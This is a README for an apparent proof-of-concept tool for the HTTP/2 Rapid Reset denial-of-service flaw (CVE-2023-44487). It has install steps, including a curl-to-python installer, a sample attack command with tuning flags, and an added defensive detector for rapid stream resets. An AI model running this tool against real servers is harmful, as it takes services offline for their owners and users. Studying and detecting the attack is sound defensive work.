
CVE-2023-44487 PoC — Apache HTTP/2 Resource Management Error Vulnerability

Associated Vulnerability
Title: Apache HTTP/2 Resource Management Error Vulnerability (CVE-2023-44487)
Description: The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
Description
A Python-based exploit to test the rapid reset attack (CVE-2023-44487)
Readme
# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test the rapid reset attack (CVE-2023-44487). Note: for educational purposes only.


## Table of Contents

- [Installation](#installation)
- [Usage](#usage)

## Installation

Clone the repository to your local machine using Git, install Poetry, and run the program:

```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git

cd CVE-2023-44487

# Install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -

# Install the project dependencies:
poetry install

# Activate the virtual environment created by Poetry:
poetry shell

# Show the help text:
python main.py

# Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100  --max_streams 20 --parallel_connections 2
```

## Usage
```bash
Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.
```
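To check whether a server under test is seeing the rapid reset pattern, the following added example (not part of this repository) flags connections that cancel many streams almost immediately after opening them. The event tuple layout, the thresholds, and the function names are assumptions chosen for illustration; real servers expose frame data in their own formats.

```python
from collections import defaultdict, deque

# Constructed sample: (seconds, connection id, client frame type, stream id).
# The tuple layout is an assumption, not a real server log format.
def make_events():
    events = []
    # Connection "A": ordinary client, 20 requests, one cancelled after 5 s.
    for i in range(20):
        events.append((i * 0.5, "A", "HEADERS", 2 * i + 1))
    events.append((6.0, "A", "RST_STREAM", 5))
    # Connection "B": each stream is reset 1 ms after it is opened.
    for i in range(300):
        t = 1.0 + i * 0.002
        events.append((t, "B", "HEADERS", 2 * i + 1))
        events.append((t + 0.001, "B", "RST_STREAM", 2 * i + 1))
    return sorted(events)

def detect_rapid_reset(events, window=1.0, max_fast_resets=100, fast=0.05):
    """Return {conn: time first flagged} for connections where more than
    max_fast_resets streams were reset within `fast` seconds of being
    opened, inside any `window`-second span. Thresholds are assumptions."""
    opened = defaultdict(dict)    # conn -> {stream_id: open time}
    recent = defaultdict(deque)   # conn -> times of fast resets in window
    flagged = {}
    for ts, conn, ftype, sid in events:
        if ftype == "HEADERS":
            opened[conn][sid] = ts
        elif ftype == "RST_STREAM":
            t_open = opened[conn].pop(sid, None)
            if t_open is None or ts - t_open > fast:
                continue          # unknown stream or an ordinary late cancel
            q = recent[conn]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()       # drop resets that fell out of the window
            if len(q) > max_fast_resets and conn not in flagged:
                flagged[conn] = ts
    return flagged

if __name__ == "__main__":
    for conn, ts in detect_rapid_reset(make_events()).items():
        print(f"connection {conn} flagged at t={ts:.3f}s")
```

A server-side mitigation would act on the flag by sending GOAWAY and closing the connection, since the cancelled streams no longer count against the concurrent-stream limit.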




